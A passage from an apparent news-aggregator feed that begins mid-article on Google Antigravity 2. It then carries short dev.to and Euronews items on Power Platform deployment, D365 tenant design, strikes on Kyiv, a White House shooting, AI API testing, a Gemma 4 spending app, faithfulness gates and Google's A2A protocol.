The [desktop app](https://antigravity.google/product/antigravity-2), [CLI](https://antigravity.google/product/antigravity-cli), [SDK](https://antigravity.google/product/antigravity-sdk), and [API](https://blog.google/innovation-and-ai/technology/developers-tools/managed-agents-gemini-api/) all share a common orchestration foundation. Developers aren't learning five separate systems. They're learning one mental model expressed through different interfaces. That consistency eliminates a painful class of bugs: the "works in the GUI but fails in the CLI" failure mode that plagues tools with inconsistent backends.

### Co-Optimized Model and Harness

Google spent the months between [v1 and v2](https://dev.to/gde/google-antigravity-10-to-20ide-quick-migration-guide-35p5) co-optimizing three layers simultaneously: the product, the agent harness, and the Gemini training stack. The model is trained *against* the harness it runs inside. That feedback loop is a structural advantage that competitors using third-party models cannot easily replicate — and it's why Google's claim that Gemini 3.5 Flash was built *with* Antigravity matters beyond the anecdote.

### JSON Hooks for Extensibility

A new hooks system lets you intercept and control agent behavior at execution time without modifying the agent itself:

```
{
  "hooks": {
    "pre_execution": {
      "type": "approval_gate",
      "condition": "file_changes > 50",
      "action": "require_human_approval"
    },
    "post_execution": {
      "type": "audit_log",
      "destination": "compliance_db",
      "fields": ["agent_id", "files_modified", "timestamp", "cost_tokens"]
    }
  }
}
```

This is what enables compliance checkpoints, custom logging, and approval gates — the features that make enterprise adoption feasible rather than aspirational.

### Project Scope Replaces Workspace Scope

Previously, agent conversations were scoped to a single repository. Now they're scoped to a "project" spanning multiple folders, each with independent permission settings. This unlocks genuine cross-repo tasks — refactoring a shared library and its consumers simultaneously — while preserving fine-grained access control.

### Honest Admission on Browser Capability

The `[/browser](https://antigravity.google/docs/getting-started)`

command is an explicit opt-in, not a default. The team acknowledged that agents weren't reliably deciding *when* to use the browser on their own. Rather than ship a system that behaves unpredictably, they made it explicit. That kind of candor is worth noting — it signals a team that prioritizes trustworthy behavior over impressive demos.

## 5️⃣ I Tested the New Mental Model

Rather than just analyzing announcements, I wanted to stress-test the orchestration premise with a realistic scenario.

I took a moderately complex service — a document processing module handling file intake, classification, and storage — and worked through specifying it for agent execution versus writing it manually.

**What I discovered:**

**The specification problem is harder than it looks.** When writing for myself, I hold context in my head and make judgment calls mid-implementation. When specifying for agents, every constraint I didn't write down explicitly became a decision the agent made on its own. My first attempt produced a technically correct result that violated two implicit assumptions I hadn't stated: file size limits and idempotency requirements on retry. The output was plausible. It was also wrong for my specific system.

The lesson landed immediately: *the quality of your specification is now the quality of your output.*

**The /grill-me command is underrated.** This slash command makes the agent interrogate

*you*with clarifying questions before writing a single line. I used it on my second attempt. It surfaced three edge cases I hadn't considered. The resulting output required almost no revision. I'd argue this command is more valuable than any benchmark number.

**Parallel agents excel at tasks that suffer from context switching.** Simultaneous agents handling refactoring, test generation, and documentation — without each one's context polluting the others — produced noticeably cleaner, more coherent outputs than sequential single-agent approaches.

**What failed:** The review agent caught internal inconsistencies but couldn't catch domain-level errors. It didn't know that "retry on failure" carried specific compliance implications in my context. The agent produces plausible code. Whether it's *correct* code for your specific system remains your responsibility.

That gap — between *plausible* and *correct* — is where the real risk lives, and it won't appear in any benchmark.

## 6️⃣ Why Orchestration Matters More Than Velocity

For years, software engineering rewarded implementation speed above most other metrics. Orchestration doesn't make velocity irrelevant — but it introduces a different set of skills that are now becoming primary dif

---
## Environment variables vs connection references in Power Platform

> Published: 2026-05-24 06:06:24+00:00
> Source: https://dev.to/sapotacorp/environment-variables-vs-connection-references-in-power-platform-1ale
> wpnews: https://wpnews.pro/news/environment-variables-vs-connection-references-in-power-platform

Environment variables and connection references in Power Platform both enable managed solutions to be imported across Dev, Test, UAT, and Prod environments without developer edits, but they serve distinct purposes: connection references point to authenticated connections (representing "who" the flow connects as), while environment variables store typed values like URLs or secrets (representing "what" the flow connects to). During import, connection references arrive empty and must be manually bound to existing connections in the target environment, whereas environment variables are populated from deployment-settings.json files. Misunderstanding this split can cause flows to either fail on import or run successfully against the wrong target system.

Both environment variables and connection references exist for the same reason: a managed solution should import into Dev, Test, UAT and Prod without the developer editing anything between stages. They achieve that reason in different ways, and teams who conflate them end up with flows that either fail on import or run successfully against the wrong target system.
Here is the split we enforce, and the deployment-settings pattern that ties it together.
Connection references are pointers to actual authenticated connections. A connection is the object that holds "here is my SharePoint authentication" or "here is my credential to Acme's REST API." A connection reference is a named slot that a flow uses instead of a direct connection.
When a managed solution imports into a new environment, connection references come in empty. They have to be bound to connections that exist in the target environment. First import pauses for the admin to create those connections; subsequent imports reuse them.
Environment variables are typed values - strings, numbers, JSON, booleans, secrets referenced from Azure Key Vault - that solution-aware code reads at runtime. A flow calls environmentVariables('acme_AcmeApiBaseUrl') and uses the returned value in an HTTP action.
The distinction: a connection reference represents who the flow connects as. An environment variable represents what the flow connects to.
Connection reference for:
Environment variable for:
The smell test: does the flow authenticate with this thing? Connection reference. Is it a value the flow uses? Environment variable.
When the pipeline imports a managed solution, the target environment needs values for every env variable and bindings for every connection reference. Both come from deployment-settings.json committed to the repo, one per target.
The pipeline step per target:
Secrets live in Key Vault, referenced by Key Vault URI from a secret-type env variable. Nothing sensitive lands in git.
Definitions live inside the solution at Other/EnvironmentVariables.xml. The deployment-settings file references them by SchemaName. If the casing differs, you get either:
The second is the dangerous one. A flow that hits null for an API base URL will typically construct a malformed URL and fail at the HTTP call, with an error message that points at the HTTP action rather than the missing variable.
We now generate the deployment-settings skeleton from the solution XML instead of hand-writing it:
The team fills in the Values, never the SchemaNames. One class of typo gone.
First import into a new environment leaves connection references empty. The solution import succeeds but the flows cannot run - they have no connection to authenticate through.
Two ways to handle this:
Path 2 requires one-time manual work per connection per environment, then every future deploy is hands-off. Path 1 is fine for low-frequency deploys but burns human time on every release.
When a client takes over admin of an environment we built, they get:
The clearer the split is in our heads, the cleaner the handoff is for theirs.

---
## Multi-BU D365 environment: single tenant, multiple LEs

> Published: 2026-05-24 06:06:03+00:00
> Source: https://dev.to/sapotacorp/multi-bu-d365-environment-single-tenant-multiple-les-29f
> wpnews: https://wpnews.pro/news/multi-bu-d365-environment-single-tenant-multiple-les

Here is a factual summary of the article:

The article outlines three architecture patterns for multinational corporations implementing D365 Finance & Operations across multiple business units (BUs). It argues that the only scalable pattern is a single tenant with multiple legal entities (LEs), where BU isolation is achieved through organization hierarchies and security roles rather than separate environments. The two failing patterns—a single unified legal entity and separate tenants per BU—are rejected for causing either immediate operational conflicts or long-term administrative and integration overhead.

Multinational corporations implementing D365 Finance & Operations across business units often underestimate how much the environment strategy decision will shape the next decade of their ERP life. Each business unit operating in a different industry brings its own processes, regulatory compliance, and data sensitivities. Picking the wrong structure at the start is expensive to reverse.
Three patterns surface in architecture workshops. Each has advocates; only one scales.
The two corner cases that fail
Single instance with one unified legal entity for all business units. Appealing for simplicity: one configuration, one security model, one master data set. Breaks immediately when BUs have different:
- Fiscal calendars (calendar year vs fiscal year)
- Chart of accounts detail (manufacturing vs services have fundamentally different GL structures)
- Statutory reporting obligations (healthcare vs retail have distinct regulatory packages)
- Intercompany boundaries (unified LE can't intercompany with itself)
The appeal wears off in the first cross-industry consolidation discussion.
Separate tenant per business unit. Isolates BUs completely. Produces predictable problems:
- Cross-BU consolidated reporting becomes an Azure Synapse project
- Every tenant has its own license, its own upgrade schedule, its own admin overhead
- M&A that reorganizes BUs requires tenant migrations
- Economies of scale in shared configuration disappear
Teams propose this pattern when they're nervous about sharing environments. Usually the fear is solvable with security boundaries inside a shared tenant.
Custom integration layer merging outputs from separate D365 environments. Builds a new system to fix a problem the platform already addresses. Permanent ongoing cost; introduces a new source of truth; slows every new BU onboarding.
The pattern that scales
Single tenant, multiple legal entities, with business unit isolation via organization hierarchies and security roles.
The architecture:
- One D365 tenant hosting production + non-production environments
- One legal entity per BU (or one per BU-and-country if BUs operate in multiple countries)
- Country localization packages applied per LE as needed
- Organization hierarchies - Corporate → BU → Operating Unit → Department - supporting both financial reporting cuts and security boundaries
- Security roles scoped to BU via the organization hierarchy - a BU's users see only their BU's data despite sharing the tenant
- Shared master data where BUs share vendors or customers, via global address book; BU-exclusive master data configured per-LE
- Customizations in layered models - a Core model for shared logic, BU-specific models for industry variations, deployed together
The result: BUs operate with the independence they need, while corporate gets the consolidation, shared admin, and platform economics.
Organization hierarchy design
The hierarchy is how the tenant supports both financial and operational cuts:
- Financial reporting hierarchy: LE ↔ BU ↔ Division ↔ Corporate. Rolls trial balances up for consolidation.
- Operational hierarchy: LE ↔ BU ↔ Department ↔ Team. Drives security and workflow routing.
- Legal hierarchy: LE ↔ Parent LE ↔ Ultimate parent. For statutory ownership disclosures.
Multiple hierarchies coexist. Each serves a specific purpose. Conflating them into one is a common design error.
Security model with BU isolation
Security inside a shared tenant keeps BU data separate via:
- Legal entity scope on roles - a BU's accountants see only their LEs
- XDS (Extensible Data Security) policies - row-level filtering beyond LE (e.g., department scope within an LE)
- Organization hierarchy context in XDS - policies reference the user's BU via hierarchy
- Centralized roles for corporate functions - corporate finance, corporate audit, IT admin roles span all LEs with approval
This is more work than "just use separate tenants" but gives the single-tenant economics without compromising data boundaries.
Customization layering per BU
F&O's extension model supports layered customizations. The pattern:
- Foundation model - corporate-standard extensions that all BUs inherit (localization-specific tax extensions, centralized approval frameworks)
- Industry models - shared extensions per industry for BUs in that vertical (manufacturing extensions, retail extensions)
- BU-specific models - extensions unique to a single BU's needs
Each model version-controlled separately, deployed as a dependency chain. A BU's customization reaches them without polluting others.
ALM across BUs
With the multi-BU tenant, ALM has to support:
- Shared build pipeline for foundation and industry models
- Per-BU pipelines for BU-specific models
- Environment strategy - dev per BU for BU-specific work, shared sandboxes for integration testing, shared UAT for coordinated testing, production shared by all BUs
The build coordination is the new complexity. Usually addressed by a center-of-excellence team that owns foundation + industry models and coordinates release trains with BU teams.
When separate tenants is right
There are rare cases where separate tenants genuinely fit:
- Regulatory isolation required by law (certain defense or pharma scenarios)
- Data residency conflicts that can't be resolved within one tenant's regional deployment
- M&A scenarios where the acquired unit will eventually spin out
- Extreme size difference where the BU's scale warrants its own admin team
Each of these is rare. The default for multi-BU multinationals is single tenant, multi-LE.
What ships with the pattern
A working multi-BU D365 tenant has:
- Per-BU legal entities with appropriate localization
- Organization hierarchies for financial and operational cuts
- Security roles scoped to BU via hierarchy and XDS
- Shared master data framework with BU-specific release patterns
- Layered customization models (foundation, industry, BU)
- CoE governance for shared configuration
- ALM pipelines supporting the model layering
The pattern is boring because it's well-trodden. That's the point. Novel environment strategies are where multi-year regret accumulates.

---
## At least one killed after massive Russian drone and missile attack on Kyiv

> Published: 2026-05-24 06:04:23+00:00
> Source: http://www.euronews.com/my-europe/2026/05/24/at-least-one-killed-after-massive-russian-drone-and-missile-attack-on-kyiv
> wpnews: https://wpnews.pro/news/at-least-one-killed-after-massive-russian-drone-and-missile-attack-on-kyiv

A massive Russian drone and missile attack on Kyiv early Sunday killed at least one person and injured over 20, damaging residential buildings, schools, and other infrastructure across nine districts. The assault followed Ukrainian President Zelenskyy's warning of intelligence indicating Russia was preparing a strike using the hypersonic Oreshnik ballistic missile, though it was unclear if that weapon was deployed. The attack continued after sunrise, with local authorities reporting ongoing strikes on the capital.

The attack came after Ukrainian President Volodymyr Zelenskyy warned of intelligence that Russia would launch a significant attack using the hypersonic Oreshnik ballistic missile. It was not immediately clear if the missile had been used in the overnight attack.
Russia launched a wave of overnight strikes on Kyiv early on Sunday, killing at least one person and leaving more than 20 injured, local authorities said.
The intense assault that shook buildings across the city center, including near government offices, residential buildings and schools.
"Tonight Kyiv region is once again enduring a mass enemy attack with strike drones, cruise missiles and ballistic missiles," said Mykola Kalashnyk, the head of the regional ministry administration.
The attack continued after sunrise, with more missiles and drones expected to hit Kyiv. Damage was recorded across at least nine districts of the capital including residential buildings, Kyiv military administration head Tymur Tkachenko said in a Telegram post.
In the Shevchenko district, a school building was damaged by an attack while people sheltered inside, Mayor Vitalii Klitschko said. Local authorities reported supermarkets and warehouses across the city were also damaged.
The strikes came after Ukrainian President warned of intelligence indicating Russia was "preparing a strike with the Oreshnik missile". The hypersonic multiple-warhead Oreshnik was first used on the Ukrainian city of Dnipro in November 2024. It was used a second time in January in the western Lviv region.
President Vladimir Putin said the Oreshnik, which means “hazelnut tree” in Russian, streaks at 10 times the speed of sound and is capable of destroying underground bunkers “three, four or more floors down.”
The weapon travels “like a meteorite” and is immune to any missile defence system, Putin said, adding that several such missiles, even fitted with conventional warheads, could be as devastating as a nuclear strike.
It was not immediately clear if the missile had been used in the overnight attack.
Russia had earlier also warned Ukraine would face "inevitable and severe punishment" for an alleged Ukrainian strike on a college dormitory in Russian-occupied Starobilsk in eastern Ukraine, which Moscow said killed 18 people.
Ukraine denied targeting civilians, saying it had hit a Russian Rubicon drone unit stationed in the Starobilsk area.
Moscow has launched mass barrages of missiles and drones at Ukraine almost daily since the full-scale offensive began in 2022, often hitting civilian infrastructure and causing civilian deaths.
US-led efforts to negotiate an end to more than four years of war have slowed in recent months with Washington's attention diverted towards its conflict in the Middle East.

---
## AI API Integration Testing Checklist for Multi-Model Apps

> Published: 2026-05-24 06:01:40+00:00
> Source: https://dev.to/ye_allen_/ai-api-integration-testing-checklist-for-multi-model-apps-4omo
> wpnews: https://wpnews.pro/news/ai-api-integration-testing-checklist-for-multi-model-apps

This article presents a testing checklist for applications that integrate multiple AI models (such as GPT, Claude, and Gemini) through a single OpenAI-compatible API gateway. It emphasizes verifying configuration details like base URLs, API keys, and model names before production, and recommends testing JSON response parsing, latency, retries, and fallback logic. The author also highlights the importance of logging metrics such as model name, request duration, and token usage to optimize cost and performance.

A single successful AI API request is not enough for production.
If your app uses GPT, Claude, Gemini, DeepSeek, Qwen, or other models through one OpenAI-compatible API gateway, I think the integration should be tested as a system: configuration, SDK compatibility, model names, JSON output, latency, retries, fallback, and Postman verification.
I published the full checklist here:
https://github.com/yeallen441-del/vectorengine-quickstart/blob/main/AI_API_TESTING_CHECKLIST.md
Most migration issues come from the wrong base URL, wrong API key, or unavailable model name. I test one small request with curl or Postman before touching production code.
For an OpenAI-compatible gateway, the goal is to keep the same OpenAI SDK request shape and only change the API key, base URL, and model name.
Example base URL:
https://www.vectronode.com/v1
Many production workflows need valid JSON. I test whether the response parses, whether required fields exist, and how the app handles bad output.
A useful integration log should include model name, feature name, request duration, retry count, token usage, and error status.
These fields make it easier to decide when to use a premium model and when to route to a lower-cost fallback.
VectorNode AI is the OpenAI-compatible API gateway I am building around this workflow:

---
## Comunicación y sincronización entre procesos distribuidos

> Published: 2026-05-24 05:47:35+00:00
> Source: https://dev.to/evelyn_samanthaperezriv/comunicacion-y-sincronizacion-entre-procesos-distribuidos-4ecc
> wpnews: https://wpnews.pro/news/comunicacion-y-sincronizacion-entre-procesos-distribuidos

The article explains that communication and synchronization between distributed processes are crucial for systems where processes run on different networked computers, relying on message exchange via protocols like TCP/IP, HTTP, and RPC. It highlights the importance of synchronization techniques such as semaphores and consensus algorithms to prevent errors and data inconsistencies, while also addressing challenges like network latency and concurrency. The topic is highly relevant to modern applications, including cloud computing, online gaming, and IoT.

La comunicación y sincronización entre procesos distribuidos es uno de los aspectos más complejos e importantes dentro de los sistemas distribuidos. Debido a que los procesos se ejecutan en diferentes computadoras o nodos conectados mediante una red, es necesario establecer mecanismos que permitan intercambiar información de manera eficiente y coordinar correctamente las tareas del sistema.
La comunicación distribuida se basa principalmente en el envío y recepción de mensajes. A diferencia de los sistemas centralizados, donde los procesos pueden compartir memoria directamente, en un sistema distribuido la información debe viajar a través de la red utilizando protocolos de comunicación. Estos protocolos definen las reglas para transmitir datos, garantizar que lleguen correctamente y mantener la sincronización entre nodos.
Entre los protocolos más importantes se encuentran TCP/IP, HTTP y RPC. TCP/IP es la base de la comunicación en internet y permite transmitir datos de manera confiable entre dispositivos. HTTP es ampliamente utilizado para aplicaciones web y servicios en línea, mientras que RPC permite ejecutar procedimientos en computadoras remotas como si fueran funciones locales.
La sincronización es igualmente importante, ya que múltiples procesos pueden intentar acceder al mismo recurso al mismo tiempo. Sin mecanismos adecuados, podrían ocurrir errores, inconsistencias o pérdida de información. Para evitar estos problemas, se utilizan técnicas como semáforos, exclusión mutua, relojes lógicos y algoritmos de consenso.
Uno de los principales desafíos en los sistemas distribuidos es la latencia de red. Debido a que los nodos pueden encontrarse en diferentes ubicaciones geográficas, el tiempo necesario para enviar y recibir información puede variar considerablemente. Esto afecta el rendimiento general del sistema y puede generar retrasos en aplicaciones en tiempo real.
Otro problema relevante es la concurrencia. En aplicaciones modernas, miles de usuarios pueden interactuar simultáneamente con el sistema. Los procesos distribuidos deben coordinarse para asegurar que las operaciones se ejecuten correctamente sin generar conflictos. Por ejemplo, en un sistema bancario, dos usuarios no deben modificar el saldo de una cuenta al mismo tiempo de forma incorrecta.
La sincronización también se relaciona con la consistencia de datos. En sistemas distribuidos es difícil garantizar que todos los nodos tengan exactamente la misma información en todo momento. Por ello, existen diferentes modelos de consistencia que equilibran rendimiento y precisión según las necesidades de cada aplicación.
Actualmente, este tema tiene gran relevancia en áreas como videojuegos en línea, computación en la nube, redes sociales, inteligencia artificial distribuida e internet de las cosas. Muchas aplicaciones modernas dependen de una comunicación eficiente entre múltiples dispositivos y servidores para funcionar correctamente.
Como aportación de investigación en la web, pueden analizarse protocolos de comunicación modernos, algoritmos de sincronización, métodos para reducir la latencia y tecnologías utilizadas en sistemas distribuidos de gran escala. También es posible investigar cómo la comunicación distribuida influye en el rendimiento y la experiencia del usuario en aplicaciones actuales.

---
## I let Gemma 4 analyze my credit card statements so I wouldn't have to

> Published: 2026-05-24 05:44:43+00:00
> Source: https://dev.to/simonwu/i-let-gemma-4-analyze-my-credit-card-statements-so-i-wouldnt-have-to-4498
> wpnews: https://wpnews.pro/news/i-let-gemma-4-analyze-my-credit-card-statements-so-i-wouldn-t-have-to

The article describes Swipey, a local-first, privacy-focused web app that uses Google's Gemma 4 AI model to analyze credit card spending across multiple banks. By uploading CSV transaction files from Chase or Capital One, the app generates monthly digests with spending spotlights, patterns, suggestions, and editable transaction groupings. The author notes that Gemma 4 served as a capable open-source replacement for Claude in this workflow, successfully categorizing transactions and surfacing spending insights.

This is a submission for the Gemma 4 Challenge: Build with Gemma 4
Swipey, a local-first, privacy focused web app for people juggling multiple credit cards across multiple banks. Drag in a CSV of transactions from Chase or Capital One, pick a month, and Gemma 4 produces a digest of that month's spending: a spotlight, a few patterns, and a few suggestions. It also proposes "groups" that bundle similar transactions and sum the spend, which you can edit inline.
The problem: I have four credit cards. I enjoy collecting credit card reward points (anyone else?!) to help subsidize travel costs 1. This usually means chasing different category bonuses on each (one for dining, another for travel, a third for everything else). Past two or three cards, no single bank app shows you the whole picture, and the interesting questions ("what was my biggest category this month?", "how does this compare to last month?") get hard to answer.
The first version shipped transaction-level data to Claude every month. Swipey on Gemma 4 keeps the same workflow but runs inference on Cloudflare Workers AI.
Note: Transaction data was mocked for demo purposes
Monthly insights digest (spotlight, patterns, suggestions)
Transaction grouping that bundles similar merchants/themes and sums their spend
A local-first, privacy-focused way to manage credit card spend across multiple banks, built with Next.js and PostgreSQL.
Supports Chase and Capital One CSV exports.
⚠️ Work in progress, local use only. This project is intended to run on your own machine against a local database. API routes have no authentication. If hosted, anyone who can reach the server can read or modify your transactions. The Docker Compose setup ships with default dev credentials that are not safe for any deployed environment. Don't expose this to the public internet as-is.
Model: @cf/google/gemma-4-26b-a4b-it
(the 26B MoE variant) on Cloudflare Workers AI. This is the only Gemma 4 variant Cloudflare hosts as of May 2026, but here's how I would have picked between variants:
One caveat during the migration: Gemma 4 needed a stricter setup than Claude to emit my parser's format reliably. The fix was a system prompt insisting on the exact format, plus wrapping the user prompt in XML with an <output>
block showing the shape to mirror. Since migration, every run has parsed cleanly.
What stood out most is how capable open-source models like Gemma 4 have become at the kind of work Swipey leans on: categorizing/grouping transactions, summarizing a month of spend, and surfacing patterns. For this use case, Gemma 4 was a quality drop-in replacement against Claude. As these open-source models keep improving, I expect that gap to keep narrowing.
Swipey has already surfaced spending habits I didn't even think of to track. It's an incredibly exciting time to see how AI-powered features augment into existing workflows and surface insights I would have otherwise missed.
Now if you'll excuse me, Gemma 4 has some thoughts about my dining out habits that I have to reflect on. Cya!
Careful. This only works if the balance is paid off in full each month. Otherwise the interest eats the perks many times over. The rewards stack up to something real if done responsibly. ↩

---
## Gunman killed after shootout with Secret Service near White House, Trump says

> Published: 2026-05-24 05:44:34+00:00
> Source: http://www.euronews.com/2026/05/24/gunman-killed-after-shootout-with-secret-service-near-white-house-trump-says
> wpnews: https://wpnews.pro/news/gunman-killed-after-shootout-with-secret-service-near-white-house-trump-says

A gunman was killed after exchanging gunfire with Secret Service agents near the White House on Saturday evening, with President Donald Trump inside the building but unharmed. One bystander was also struck by gunfire during the incident, while no officers were injured. Trump later stated that the shooter had a "violent history and possible obsession" with the White House.

Trump said the shooter had a "violent history and possible obsession" with the White House.
A gunman was killed following a shootout with Secret Service agents close to the White House on Saturday, US President Donald Trump and law enforcement officials said.
The individual had pulled out a gun and began firing just after 6 pm on Saturday evening, in the area of 17th Street and Pennsylvania Avenue, Anthony Guglielmi, the US Secret Service's chief of communications, said in a statement.
Trump was in the White House at the time, but he was not impacted by the incident, per Guglielmi.
"Secret Service Police returned fire striking the suspect who was transported to an area hospital where he was pronounced deceased," the statement reads. "During the shooting one bystander was also struck by gunfire."
No officers were reported to have been injured.
In a post on Truth Social, Trump said the shooter had a "violent history and possible obsession" with the White House and thanked authorities for their "swift and professional action".
It "goes to show how important it is, for all future Presidents, to get, what will be, the most safe and secure space of its kind ever built in Washington, D.C.," Trump added.
Trump has been the target of a number of suspected assassination attempts in the last two years.
In April, a man was charged with one count of attempt to assassinate the US president after authorities say he stormed the White House correspondents’ dinner armed with guns and knives.

---
## Faithfulness gate: the agent layer most teams skip

> Published: 2026-05-24 05:37:27+00:00
> Source: https://dev.to/sapotacorp/faithfulness-gate-the-agent-layer-most-teams-skip-4kl1
> wpnews: https://wpnews.pro/news/faithfulness-gate-the-agent-layer-most-teams-skip

The article explains that many AI agent teams skip implementing a "faithfulness gate," which checks whether an agent's response is actually supported by the retrieved context before delivering it to the user. This oversight can lead to confident but incorrect answers, as illustrated by a B2B SaaS customer who wasted two days trying to configure SSO after an AI assistant falsely claimed their Pro plan included it. The fix involves extracting atomic claims from the response, verifying them against the retrieved context, and either retrying the search, admitting uncertainty, or escalating to a human if the response fails the check.

A B2B SaaS team got an angry email from a customer last quarter. The customer's account team had asked the company's AI assistant whether their plan included SSO. The assistant said yes. The customer's IT team spent two days trying to configure it, escalated to support, and discovered the assistant had been wrong. SSO was on the Enterprise tier. The customer was on Pro.
The assistant had searched the documentation, found nothing definitive about which tiers included SSO, and produced a fluent answer based on what seemed plausible from training data. The user had no way to know it was a hallucination.
The fix was not "a better model." A larger LLM would have hallucinated more confidently with the same insufficient context. The fix was a layer that should have been there from day one: a faithfulness gate that checks whether the agent's response is actually grounded in the retrieved context before shipping it to the user.
This is one of the highest-leverage interventions for production AI agents. Most teams skip it because the failure mode is invisible until a customer complains.
Faithfulness is a single question: does the agent's response make claims that are supported by the context the agent retrieved?
If the agent searched the KB and found "Pro tier includes basic features X, Y, Z. Enterprise tier includes X, Y, Z plus advanced features A, B, C, including SSO," then a response saying "your Pro plan includes SSO" is unfaithful. The retrieved context does not support that claim.
This is different from "is the response correct." Correctness requires ground truth. Faithfulness only requires the retrieved context. You can check it without a human in the loop.
The mechanic: extract atomic claims from the response, check each claim against the retrieved context, return a score. Below threshold, the response is unfaithful and should not be shipped.
The pattern is straightforward:
Frameworks like Ragas implement this directly. You can also build it yourself with a single LLM call using a structured prompt. The judge model does not need to be the production model. We typically use GPT-4o-mini or Claude Haiku for the judge to keep costs low; they are accurate enough for this task.
Bigger models are not less likely to hallucinate. They are more confident hallucinators. Given the same insufficient context, GPT-4o will produce a better-written, more structured, more authoritative-sounding wrong answer than GPT-3.5 ever could.
The faithfulness gate works at a different layer than the model. It does not care how confident the model sounds. It only cares whether the claims in the response can be traced back to the retrieved context.
In the team's audit, faithfulness gates caught about 40% of the responses that customers had previously reported as wrong. Most of those would not have been caught by switching to a more expensive model.
Where to set the faithfulness threshold is a product decision, not a technical one.
The team we worked with was in B2B SaaS. We set the threshold at 0.88 initially, monitored the rejection rate (about 6% of responses), and tuned to 0.85 after a week when the rejection rate felt too aggressive for the user experience.
The agent has three options when a response fails the faithfulness check:
Retry with augmented context. The agent searches again with a query informed by the failure. Sometimes the original retrieval was insufficient and a second pass surfaces the missing context. Retry once, max twice. Beyond that, do not loop.
Return "I cannot answer this confidently." Honest about the limitation. Surfaces a real product problem (insufficient documentation, ambiguous query) that the team can address. Better than a confident wrong answer.
Escalate to human handoff. The agent surfaces the question to a human support agent, with the retrieved context attached. Useful for customer-facing systems where "I don't know" is not an acceptable terminal state.
Production teams ship all three. Retry first (cheap, often resolves), fallback to honest "I don't know" (acceptable for low-stakes), escalate for high-stakes or repeat questions.
The original system was a customer support agent with RAG over the documentation. We added:
Customer-reported wrong answers dropped 60% in the first month. The faithfulness gate did not improve correctness in the abstract; it just stopped the system from confidently shipping wrong answers to customers. The honest "I don't know" responses were initially worried about (would users be unhappy?) but turned out to be received well. Users prefer "I don't know" to wrong answers, even when they think they want fast answers.
The unexpected benefit was the failed-check log. The team now had a list of every question the documentation could not confidently answer. That became the documentation backlog. Six months in, customer-reported issues had dropped 80% from the pre-gate baseline, partly from the gate and partly from the documentation improvements the gate surfaced.
A faithfulness gate prevents one specific failure mode: claims unsupported by retrieved context. It does not catch:
The gate is necessary but not sufficient for production reliability. It is the highest-leverage single intervention, but it is not the only intervention.
For production agents that handle factual queries (customer support, internal knowledge, compliance, anything where being wrong has cost):
The infrastructure cost is roughly $0.001 per response. The reduction in customer-reported errors is typically 40 to 60% in the first month.
This is not optional for production B2B agents. It is the layer that turns a demo into a product.
If your team has had customers report incorrect answers from your AI assistant, and "we'll switch to a better model" has not fixed it, the missing layer is almost certainly faithfulness checking.
Sapota offers a one-week implementation engagement that adds faithfulness checking to your existing agent, calibrates the threshold against your historical reports, and ships the retry and fallback logic as a working PR. We have done this for customer support agents, internal knowledge bases, and compliance tools.
Reach out via the AI engineering page with a few examples of incorrect responses your agent has given. The diagnostic conversation usually surfaces both the faithfulness gap and the documentation gaps that the gate will help expose.

---
## Why I Can't Stop Thinking About Google's New A2A Protocol

> Published: 2026-05-24 05:37:06+00:00
> Source: https://dev.to/devadhithiya/why-i-cant-stop-thinking-about-googles-new-a2a-protocol-5dml
> wpnews: https://wpnews.pro/news/why-i-can-t-stop-thinking-about-google-s-new-a2a-protocol

Google's new Agent2Agent (A2A) Protocol, unveiled at Google I/O 2026, is an open-source communication standard that enables AI agents built on different frameworks to discover, negotiate, and collaborate with each other. Unlike consumer-focused AI updates, A2A solves the problem of incompatible agent ecosystems by allowing agents to interact through standardized "Agent Cards" and task-based workflows without exposing internal code or data. The protocol fundamentally shifts software architecture toward interoperable, fault-tolerant multi-agent systems where specialized agents can be easily swapped or managed by third parties.

When Sundar Pichai dropped the words "agentic Gemini era" at Google I/O 2026, everyone naturally fixated on the shiny consumer updates. We all stared at Gemini Spark booking dinner reservations in the background, completely ignoring the absolute unit of a developer update standing right next to it.
Look, having a background AI handle your OpenTable reservations is cool, but if you’re a developer, the real sauce wasn't a consumer product. It was a communication standard.
I'm talking about the Agent2Agent (A2A) Protocol. Let's break down why A2A is the actual MVP of this year's I/O, and why you should care before your multi-agent codebase turns into an unmaintainable nightmare.
The Problem: We Rebuilt Silos, Just Smarter Ones
To understand why A2A matters, we have to look at the current state of AI agents. Over the last couple of years, we’ve seen an explosion of agentic frameworks—LangGraph, crewAI, IBM's BeeAI, and Google’s own Agent Development Kit (ADK).
The problem? They don't talk to each other.
Right now, trying to get a specialized LangChain agent to delegate a sub-task to your proprietary Google ADK agent usually hits a wall of incompatible formats. You want a multi-agent workflow? Great, you're locked into one ecosystem. We essentially built highly intelligent microservices, but somehow forgot to invent the HTTP to connect them.
Enter A2A: The Universal Translator
Originally seeded last year and heavily spotlighted at this I/O, the A2A protocol (now an open-source Linux Foundation project) is basically the universal translator for the agentic web.
A2A is an open standard that lets these isolated agents discover each other, negotiate, and actually collaborate—regardless of what model or framework they are built on. It is essentially JSON-RPC 2.0 over HTTP(S), but purpose-built for the chaos of autonomous AI.
How it Works
Instead of exposing internal memory or proprietary logic, A2A lets agents interact through a standardized rulebook:
Agent Cards: Think of this as a LinkedIn profile for AI agents. It’s a URL-accessible JSON file where the agent advertises its capabilities ("Fluent in Python," "Enjoys reading massive SQL databases").
The Client/Server Model: The A2A Client (the delegating agent) sends a request. The A2A Server (the remote agent doing the grunt work) exposes a compatible endpoint to take the job.
Tasks & Artifacts: Agentic work takes time. You can't just await and pray. A "Task" tracks the job status so your system isn't left hanging, and an "Artifact" is the actual deliverable streamed back to the client once the job is done.
Why This Changes the Game
A2A fundamentally shifts how we will architect software in the agentic era.
True Interoperability
You no longer have to build monolithic AI applications. You can build a specialized inventory agent using Anthropic's MCP to read your database. When stock is low, that agent can use A2A to securely ping a completely different supplier agent built by a third-party vendor. They negotiate an order without either party exposing their internal codebase.
Fault Isolation
By breaking workflows into discrete, A2A-compliant agents, your system becomes incredibly resilient. If one specialized agent starts hallucinating or fails, the whole workflow doesn't crash. You just hot-swap the misbehaving agent for a better one by updating the URL in your Agent Card.
Preserving Opacity
Enterprise adoption of multi-agent systems has been terrified of data leaks. A2A allows agents to collaborate while maintaining strict boundaries. My agent can ask your agent to solve a problem, and your agent just returns the answer. "Alright then, keep your secrets," my agent essentially says, completely blind to the 47 janky proprietary tools your agent used behind the scenes to get the job done.
The Takeaway
The TL;DR of Google I/O 2026? The future of AI isn't one giant, omnipotent God-Model. It's a massive, interconnected web of specialized multi-agent systems getting work done behind the scenes.
